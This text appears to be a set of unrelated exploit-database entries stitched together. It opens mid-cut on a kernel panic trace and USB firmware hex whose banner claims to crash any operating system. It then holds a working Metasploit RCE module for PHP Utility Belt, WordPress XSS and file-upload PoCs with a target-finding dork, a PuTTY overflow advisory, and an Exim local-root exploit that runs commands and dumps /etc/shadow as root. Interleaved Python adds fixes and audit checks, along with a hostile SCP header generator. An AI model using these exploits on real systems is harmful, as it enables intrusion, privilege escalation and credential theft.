[ 33.345023] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 33.345023] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 33.345023] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 33.345023] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 33.345023] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 33.345023] Code: 0d eb 2e 0f 1f 44 00 00 4c 89 e3 49 89 c4 48 8b 7b 48 e8
81 de d8 e0 48 8b 7b 58 e8 78 de d8 e0 48 89 df e8 70 de d8 e0 4d 39 ec <49>
8b 04 24 75 d7 49 8b be b8 00 00 00 e8 5b de d8 e0 5b 41 5c
[ 33.345023] RIP [<ffffffffa041d063>] free_substream.part.0+0x53/0x70
[snd_usb_audio]
[ 33.345023] RSP <ffff88000bd239b8>
[ 33.345023] CR2: 0000000000000000
[ 33.876830] ---[ end trace b239663354a1c556 ]---
[ 33.882175] Kernel panic - not syncing: Fatal exception
[ 33.883149] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP Utility Belt Remote Code Execution',
      'Description'    => %q{
         This module exploits a remote code execution vulnerability in PHP Utility Belt,
         which is a set of tools for PHP developers and should not be installed in a
         production environment, since this application runs arbitrary PHP code as an
         intended functionality.
      },
      'Author'         =>
        [
          'WICS',     # initial discovery
          'Jay Turla' # msf
        ],
      'References'     =>
        [
          ['EDB', '38901'],
          ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
        ],
      'DisclosureDate' => 'Aug 12 2015',
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          ['PHP Utility Belt', {}]
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
      ], self.class)
  end

  # Probe: ask the target to echo a random marker and look for it in the
  # response body; a reflected marker proves the 'code' parameter is eval'd.
  def check
    txt = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{txt};")

    if res && res.body.include?(txt)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # No injection trick is needed: ajax.php evaluates the submitted PHP by
  # design, so the encoded payload is posted as-is.
  def exploit
    http_send_command(payload.encoded)
  end

  # POST the PHP source to ajax.php in the 'code' form field.
  def http_send_command(cmd)
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        'code' => cmd
      }
    )
  end

end
            
* Exploit Title: Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities <=8.60
* Discovery Date: 01.05.2016
* Public Disclosure Date: 03.09.2016
* Vendor Homepage: http://digitalzoomstudio.net/
* Software Link: http://codecanyon.net/item/video-gallery-wordpress-plugin-w-youtube-vimeo-/157782
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: <=8.60
* Tested on: Wordpress 4.2.x-4.4.x
* OVE-20160305-2497


Technical details:

Unauthenticated CSRF & XSS (reflected XSS: the initer GET parameter is echoed into a JavaScript string literal)
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
 if(isset($_GET['initer'])){
            $initer = $_GET['initer'];
        }
Line 27 (unsanitized output; the %27 in initer closes the single-quoted literal and the rest of the value runs as JavaScript):
       <?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------       
Unauthenticated CSRF & XSS (same pattern in the tags editor popup)
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/tagseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645

Line 13-15 (unsanitized input):
 if(isset($_GET['initer'])){
            $initer = $_GET['initer'];
        }
Line 27 (unsanitized output; the %27 in initer closes the single-quoted literal and the rest of the value runs as JavaScript):
       <?php echo "var initer = '" . $initer . "';"; ?>
--------------------------------------- 
Unauthenticated CSRF & XSS (reflected XSS in ajax.php; the source, type, width and height GET parameters are written into HTML attribute values):
POC(s):
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1)<%2fscript>894ba&type=&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=7934f"><script>alert(1)<%2fscript>99085&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=&width=54fd7"><script>alert(1)<%2fscript>4708b

Line 25 & 35 (unsanitized input & direct output; each value sits inside a double-quoted attribute, so %22%3e closes the attribute and the tag and the injected <script> element follows):
$w =  $_GET['width'];
<param name="flashvars" value="video=' . $_GET['source'] . '&types=' . $_GET['type'] . '&defaultQuality=hd" width="' . $w . '" height="' . $h . '">'.$backup.'
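The two sinks above are the same bug in two output contexts: a JavaScript string literal (popup.php line 27) and a double-quoted HTML attribute (ajax.php line 35). The following Python is an added illustration, not code from the plugin or from the advisory author: it re-renders both lines with the URL-decoded PoC values, shows why the raw concatenation breaks out, and shows the context-correct encoding that stops it. The `js_string_literal` helper is a hypothetical stand-in for the escaping a fix would use (in WordPress, `wp_json_encode()` or `esc_js()` for the script context and `esc_attr()` for the attribute context); the break-out detectors are written here for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed inputs: the URL-decoded initer / source values from the PoC URLs above.
POPUP_PAYLOAD = "whatava18642';alert(1)//645"
AJAX_PAYLOAD = '6d27f"><script>alert(1)</script>894ba'


def render_popup_vulnerable(initer: str) -> str:
    """Mirrors popup.php line 27: the raw GET value lands inside a single-quoted JS literal."""
    return "var initer = '" + initer + "';"


def js_string_literal(value: str) -> str:
    """Hypothetical fix: emit a single-quoted JS literal in which every character that
    could end the literal, the enclosing <script> element or a line is \\uXXXX-escaped."""
    out = []
    for ch in value:
        if ch in "\\'\"<>/&\n\r\u2028\u2029" or ord(ch) < 0x20:
            out.append("\\u%04x" % ord(ch))
        else:
            out.append(ch)
    return "'" + "".join(out) + "'"


def render_popup_fixed(initer: str) -> str:
    return "var initer = " + js_string_literal(initer) + ";"


def js_literal_breaks_out(statement: str) -> bool:
    """True if the first quoted literal in `statement` ends before the trailing ';'
    (an injected quote closed it early), is unterminated, or contains '</script'."""
    starts = [i for i, ch in enumerate(statement) if ch in "'\""]
    if not starts:
        return True
    start = starts[0]
    quote = statement[start]
    i = start + 1
    while i < len(statement):
        ch = statement[i]
        if ch == "\\":          # escape sequence: skip the escaped character
            i += 2
            continue
        if ch == quote:
            break
        i += 1
    else:
        return True             # ran off the end: unterminated literal
    body = statement[start + 1:i]
    rest = statement[i + 1:].strip()
    return rest != ";" or "</script" in body.lower()


def render_flashvars_vulnerable(source: str, type_: str, width: str, height: str) -> str:
    """Mirrors ajax.php line 35: four GET values inside double-quoted attributes, no encoding."""
    return ('<param name="flashvars" value="video=' + source + '&types=' + type_
            + '&defaultQuality=hd" width="' + width + '" height="' + height + '">')


def render_flashvars_fixed(source: str, type_: str, width: str, height: str) -> str:
    """Same markup with every value attribute-encoded (PHP: htmlspecialchars(..., ENT_QUOTES))."""
    def e(s: str) -> str:
        return html.escape(s, quote=True)
    return ('<param name="flashvars" value="video=' + e(source) + '&amp;types=' + e(type_)
            + '&amp;defaultQuality=hd" width="' + e(width) + '" height="' + e(height) + '">')


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment: str) -> list:
    """Start-tag names a browser-like parser sees in `fragment`; the vulnerable
    rendering of the PoC yields an extra 'script' tag, the fixed one does not."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


if __name__ == "__main__":
    for render in (render_popup_vulnerable, render_popup_fixed):
        js = render(POPUP_PAYLOAD)
        print(js, "-> breaks out:", js_literal_breaks_out(js))
    for render in (render_flashvars_vulnerable, render_flashvars_fixed):
        print(render.__name__, "->", tags_in(render(AJAX_PAYLOAD, "", "", "")))
```

The detectors are deliberately context-specific: an attribute encoder would not have saved popup.php (a `'` is harmless in HTML but ends the JS literal), and a JS encoder would not have saved ajax.php. Encoding has to match the context the value is written into.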
            
* Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
* Discovery Date: 02.09.2016
* Public Disclosure Date: 03.09.2016
* Vendor Homepage: http://www.yourinspirationweb.com
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: 1.0.8 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.4.x
 
Description
================================================================================
 The Beauty Premium theme ships a contact form whose handler, includes/sendmail.php,
 has no CSRF protection and accepts a file attachment that is not validated. The
 attachment is written to the WordPress uploads directory as submitted, so an
 attacker can upload a file containing harmful code and then request it directly.
 
 
PoC
================================================================================
Find installations with the Google dork inurl:themes/beauty-premium/ or detect the theme via WPScan, then submit the following form with a file selected in yiw_contact[file]:

<form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
<input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
<input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
<input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
<input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
<textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test</textarea>
<input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
<li class="submit-button">
<input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
<input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
<input type="hidden" name="id_form" value="test" />
<input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" />
</li>
</form>

The response to the POST is a 404, but the attachment has already been stored: browse to the site's uploads directory and request the uploaded file directly.
            
Source: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563

Author:     <github.com/tintinweb>
Date:       Feb 20th, 2016
Name:           putty
Vendor:         sgtatham - http://www.chiark.greenend.org.uk/~sgtatham/putty/ 

Version: 0.59 [3] (~9 years ago) <= affected <= 0.66
Platform(s):    win/nix
Technology:     c

Vuln Classes:   stack buffer overwrite (CWE-121)
Origin:         remote
Min. Privs.:    post auth
CVE:            CVE-2016-2563

Summary

The PuTTY SCP command-line utility (pscp) is missing a bounds check on a stack buffer when processing the SCP-SINK file-size response to an SCP download request. This may allow a malicious server to overwrite the stack buffer within the client application, potentially leading to remote code execution.

PoC attached. patch attached.

Besides that, two minor issues have been reported in putty packet handling:

DoS condition in the parsing of SSH strings that leads to a NULL pointer read (connect PuTTY to poc.py and type x11exploit to trigger one of multiple occurrences of the crash; this also works with X11 forwarding disabled in PuTTY).
DoS condition in the handling of unrequested forwarded-tcpip channel open requests that leads to a NULL pointer read (connect PuTTY to poc.py and type forwardedtcpipcrash to trigger the crash).

Details

The vulnerable code is located in pscp.c [4] at line 1498 (HEAD): an unbounded sscanf "%s" format descriptor stores a string of arbitrary length (the file-size field sent by the server) into the 40-byte fixed-size stack buffer sizestr[40].
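To make the failure mode concrete, here is an added Python example (not code from PuTTY or from the advisory author) of the SCP sink exchange from the client's point of view: `hostile_sink_header` builds the "C<mode> <size> <name>" control line a malicious server would send in place of a legitimate file header, `sizestr_overflows` is the one-line test for the condition the advisory describes (a size token that does not fit in a 40-byte buffer), and `parse_sink_header` is how a hardened client should treat the line: bound every token before copying it and reject anything that is not the expected shape. The buffer size 40 is taken from the advisory; the sample lines are constructed here.

```python
import re

SIZESTR_BUF = 40                    # sizeof(sizestr) in pscp.c, per the advisory
MAX_SIZE_TOKEN = SIZESTR_BUF - 1    # longest token that fits with its terminating NUL


def hostile_sink_header(size_token_len: int = 200, name: str = "evil.bin",
                        mode: str = "0644") -> bytes:
    """Constructed example of the control line a malicious SCP server returns where
    a legitimate one would return b'C0644 1234 file.txt\\n'. Only the length of the
    size token matters: the vulnerable client copies it into sizestr[40] unchecked."""
    return ("C%s %s %s\n" % (mode, "1" * size_token_len, name)).encode("ascii")


def sizestr_overflows(line: bytes) -> bool:
    """True when the size token on a sink control line is too long for sizestr[40],
    i.e. the input that triggers the stack overwrite in an unpatched pscp."""
    fields = line.rstrip(b"\n").split(b" ")
    return len(fields) >= 2 and len(fields[1]) > MAX_SIZE_TOKEN


def parse_sink_header(line: bytes) -> dict:
    """Parse 'C<mode> <size> <name>' (file) or 'D<mode> <size> <name>' (directory)
    the way a hardened client should. Raises ValueError on anything unexpected."""
    text = line.decode("ascii").rstrip("\n")      # the protocol fields are ASCII only
    if not text or text[0] not in "CD":
        raise ValueError("unexpected sink control byte %r" % text[:1])
    parts = text[1:].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed sink header")
    mode, size_token, name = parts
    if not re.fullmatch(r"[0-7]{4}", mode):
        raise ValueError("bad mode %r" % mode)
    if len(size_token) > MAX_SIZE_TOKEN:
        # This is the check the unbounded sscanf("%s") lacked.
        raise ValueError("size token of %d chars would overflow sizestr[%d]"
                         % (len(size_token), SIZESTR_BUF))
    if not size_token.isdigit():
        raise ValueError("non-numeric size %r" % size_token)
    if not name:
        raise ValueError("empty file name")
    return {"kind": "dir" if text[0] == "D" else "file",
            "mode": int(mode, 8), "size": int(size_token), "name": name}


def is_accepted(line: bytes) -> bool:
    """Convenience wrapper: would the hardened parser accept this server line?"""
    try:
        parse_sink_header(line)
        return True
    except (ValueError, UnicodeDecodeError):
        return False


if __name__ == "__main__":
    benign = b"C0644 1234 file.txt\n"
    evil = hostile_sink_header()
    print("benign:", parse_sink_header(benign))
    print("hostile line overflows sizestr[40]:", sizestr_overflows(evil),
          "| accepted by hardened parser:", is_accepted(evil))
```

A fuzzing or regression harness for an SCP client can feed `hostile_sink_header()` with a range of `size_token_len` values and check that the client neither crashes nor accepts the transfer; the length boundary to probe is exactly 39 versus 40 characters.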


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39551.zip
            
=============================================
- Advisory release date: 10.03.2016
- Created by: Dawid Golunski
- Severity: High/Critical
=============================================


I. VULNERABILITY
-------------------------

Exim < 4.86.2        Local Root Privilege Escalation Exploit


II. BACKGROUND
-------------------------

"Exim is a message transfer agent (MTA) developed at the University of 
Cambridge for use on Unix systems connected to the Internet. It is freely 
available under the terms of the GNU General Public Licence. In style it is 
similar to Smail 3, but its facilities are more general. There is a great 
deal of flexibility in the way mail can be routed, and there are extensive 
facilities for checking incoming mail. Exim can be installed in place of 
Sendmail, although the configuration of Exim is quite different."

http://www.exim.org/


III. INTRODUCTION
-------------------------

When an Exim installation has been compiled with Perl support and its
configuration contains a perl_startup setting, a malicious local user can
exploit it to gain root privileges.

IV. DESCRIPTION
-------------------------

The vulnerability stems from Exim versions below 4.86.2 not sanitizing the
environment before loading the Perl script defined by the perl_startup
setting in the Exim configuration.

perl_startup is usually used to load various helper scripts such as
mail filters, gray listing scripts, mail virus scanners etc.

For the option to be supported, exim must have been compiled with Perl 
support, which can be verified with:

[dawid@centos7 ~]$ exim -bV -v | grep -i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL
Content_Scanning DKIM Old_Demime PRDR OCSP


To perform the attack, the attacker can use Exim's sendmail interface, which
is a symlink to the exim binary; that binary has the SUID bit set by default,
as we can see below:

[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim 
lrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim

[dawid@centos7 ~]$ ls -l /usr/sbin/exim
-rwsr-xr-x. 1 root root 1222416 Dec  7  2015 /usr/sbin/exim


Normally, when the Exim sendmail interface starts up, it drops its root
privileges before handing control to the user (i.e. reading the mail contents
to send, etc.). However, an attacker can make use of the following command-line
parameter, which is available to all users:

-ps    This  option  applies when an embedded Perl interpreter is linked with 
       Exim. It overrides the setting of the perl_at_start option, forcing the 
       starting of the interpreter to occur as soon as Exim is started.


As we can see from the documentation at:

http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html

the perl_at_start option does the following:

"Setting perl_at_start (a boolean option) in the configuration requests a 
startup when Exim is entered."

Therefore it is possible to force the execution of the perl_startup script
defined in the Exim's main config before exim drops its root privileges.


To exploit this setting and gain the effective root privilege of the SUID binary,
the attacker sets the PERL5OPT environment variable, which affected versions of
Exim do not strip before starting the interpreter.

As per the Perl documentation, this environment variable sets Perl command-line
options (switches); switches in this variable are treated as if they were on every
Perl command line.

Several Perl switches could be set by an attacker to trigger code execution.
One of them is the -d switch, which forces perl to enter the interactive debugger,
from which it is possible to take control of the Perl application, and therefore
of the still-privileged Exim process.

An example proof of concept exploit using the -d switch can be found below.


V. PROOF OF CONCEPT ROOT EXPLOIT
-------------------------

[dawid@centos7 ~]$ head /etc/exim/exim.conf 
######################################################################
#                  Runtime configuration file for Exim               #
######################################################################

# Custom filtering via perl
perl_startup = do '/usr/share/exim4/exigrey.pl'

[dawid@centos7 ~]$ exim -bV -v | grep -i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP

[dawid@centos7 ~]$ PERL5OPT="-d/dev/null" /usr/sbin/sendmail.exim -ps victim@localhost

Loading DB routines from perl5db.pl version 1.37
Editor support available.

Enter h or 'h h' for help, or 'man perldebug' for more help.

Debugged program terminated.  Use q to quit or R to restart,
  use o inhibit_exit to avoid stopping after program termination,
  h q, h R or h o to get additional info.  

  DB<1> p system("id");
uid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
0
  DB<2> p system("head /etc/shadow");
root:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7::
[...]


VI. BUSINESS IMPACT
-------------------------

This vulnerability could be exploited by attackers who have local access to the
system to escalate their privileges to root which would allow them to fully
compromise the system.

VII. SYSTEMS AFFECTED
-------------------------

Exim versions before 4.86.2 (the patched release) are affected by this
vulnerability if Exim was compiled with Perl support and the main configuration
file (i.e. /etc/exim/exim.conf or /etc/exim4/exim.conf) contains a perl_startup
option, e.g.:

perl_startup = do '/usr/share/exim4/exigrey.pl'

Note that the script file named by perl_startup does not have to exist for the
vulnerability to be exploitable; only the option itself, with some path, must be set.
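The four preconditions listed in this section (version below 4.86.2, Perl compiled in, perl_startup set, exim setuid root) are easy to check mechanically. The following Python is an added audit helper, not code from the advisory author or from the Exim project: it parses the output of `exim -bV -v` and the main configuration text, and checks the binary's mode bits, so it can be run against a live host or, as here, against constructed sample inputs modelled on the transcripts above. The version-string format ("Exim version 4.86 #2 ...") and the default paths in `assess_local_host` are assumptions; as the text says, the existence of the perl_startup script is deliberately not checked.

```python
import os
import re
import stat
import subprocess

FIXED_VERSION = (4, 86, 2)   # first release that sanitises the environment (CVE-2016-1531)

# Constructed samples modelled on the 'exim -bV -v', config and 'ls -l' output above.
SAMPLE_BV = (
    "Exim version 4.86 #2 built 07-Dec-2015 12:00:00\n"
    "Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL "
    "Content_Scanning DKIM Old_Demime PRDR OCSP\n"
)
SAMPLE_CONF = "# Custom filtering via perl\nperl_startup = do '/usr/share/exim4/exigrey.pl'\n"
SAMPLE_MODE = 0o104755       # -rwsr-xr-x: regular file, setuid, 0755


def parse_exim_version(bv_output: str):
    """(major, minor, patch) from the 'Exim version X.Y[.Z] #N built ...' line
    (assumed format); None if no version line is present."""
    m = re.search(r"Exim version (\d+)\.(\d+)(?:\.(\d+))?", bv_output)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def perl_support_compiled_in(bv_output: str) -> bool:
    """'Support for:' lists Perl when the embedded interpreter (and thus -ps) is linked in."""
    m = re.search(r"^Support for:(.*)$", bv_output, re.M)
    return bool(m) and "Perl" in m.group(1).split()


def perl_startup_configured(config_text: str) -> bool:
    """True if the main configuration sets perl_startup on an uncommented line.
    The script it names need not exist, so its presence is not checked."""
    return re.search(r"^\s*perl_startup\s*=", config_text, re.M) is not None


def setuid_root(mode: int, owner_uid: int) -> bool:
    """True if the binary carries the SUID bit and is owned by root."""
    return bool(mode & stat.S_ISUID) and owner_uid == 0


def assess(bv_output: str, config_text: str, exim_mode: int, exim_uid: int = 0) -> dict:
    """Evaluate every precondition; 'exposed' is True only when all of them hold."""
    version = parse_exim_version(bv_output)
    checks = {
        "version_before_4.86.2": version is not None and version < FIXED_VERSION,
        "perl_support": perl_support_compiled_in(bv_output),
        "perl_startup_set": perl_startup_configured(config_text),
        "exim_setuid_root": setuid_root(exim_mode, exim_uid),
    }
    checks["exposed"] = all(checks.values())
    return checks


def assess_local_host(exim_path: str = "/usr/sbin/exim",
                      config_path: str = "/etc/exim/exim.conf") -> dict:
    """Run the same assessment against the live system (paths are assumptions;
    the advisory also names /etc/exim4/exim.conf)."""
    bv = subprocess.run([exim_path, "-bV", "-v"], capture_output=True, text=True).stdout
    with open(config_path) as f:
        cfg = f.read()
    st = os.stat(exim_path)
    return assess(bv, cfg, st.st_mode, st.st_uid)


if __name__ == "__main__":
    print("sample host:", assess(SAMPLE_BV, SAMPLE_CONF, SAMPLE_MODE))
    print("after upgrade:", assess(SAMPLE_BV.replace("4.86 #2", "4.86.2 #1"), SAMPLE_CONF, SAMPLE_MODE))
```

Run `assess_local_host()` as an unprivileged user on a suspect host; any check that comes back False is also the mitigation for that host (upgrade, or remove perl_startup / the SUID bit) until the upgrade to 4.86.2 is done.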


VIII. SOLUTION
-------------------------

Update to Exim 4.86.2 which contains the official patch that fixes the
environment sanitization issues.

IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt
http://www.exim.org/
http://www.exim.org/static/doc/CVE-2016-1531.txt
http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html
https://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f

CVE-2016-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531

X. ADVISORY CREATED BY
-------------------------

This advisory has been created by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com

XI. REVISION HISTORY
-------------------------

March 10th, 2016:  Advisory released
March 11th, 2016:  Fixed advisory header,added cve.mitre link of the root issue

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.